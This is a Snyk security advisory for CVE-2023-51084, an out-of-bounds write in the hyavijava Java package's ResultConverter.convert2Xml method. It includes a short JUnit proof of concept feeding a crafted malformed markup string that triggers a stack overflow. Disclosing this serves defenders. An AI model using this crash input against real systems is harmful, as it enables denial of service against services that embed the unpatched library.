Out-of-bounds Write Affecting com.github:hyavijava package, versions [0,]


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.19% (58th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-COMGITHUB-6144803
  • published5 Jan 2024
  • disclosed27 Dec 2023
  • creditPoppingSnack

Introduced: 27 Dec 2023

CVE-2023-51084  (opens in a new tab)
CWE-787  (opens in a new tab)

How to fix?

There is no fixed version for com.github:hyavijava.

Overview

Affected versions of this package are vulnerable to Out-of-bounds Write via the ResultConverter.convert2Xml method. An attacker can execute arbitrary code or cause a denial of service by triggering a stack overflow condition.

PoC

import org.junit.Test;
import com.vmware.vim.rest.*;
public class ResultConverterFuzzerConvert2Xml {
    @Test
    public void convert2XmlFuzzerTest() {
        try {
            String result = ResultConverter.convert2Xml("\u0015'\u0015\u0015\u0015\u0015<<tr>\u0015<tr><'\u0015td></ta\u0015'\u0015\u0015td>$</tab</ta\u0015'\u0015\u0015\u0015\u0015<<trbl>ler>\u0015\u0015\uF577\uFFD5<tr><'\u0015$</tabler>\u0015\u0015\uF577\u0015\u0015\u0015<<tr>\u0015<t</td></t\u0015a\u0015'\u0015\u0015\u0015\u0015<<trbl>\u0015<tr><'\u0015$<</tabler>\u0015\u0015\uF555\u0015<<t");
        } catch (Exception e) {
        }
    }
}

References

CVSS Base Scores

version 3.1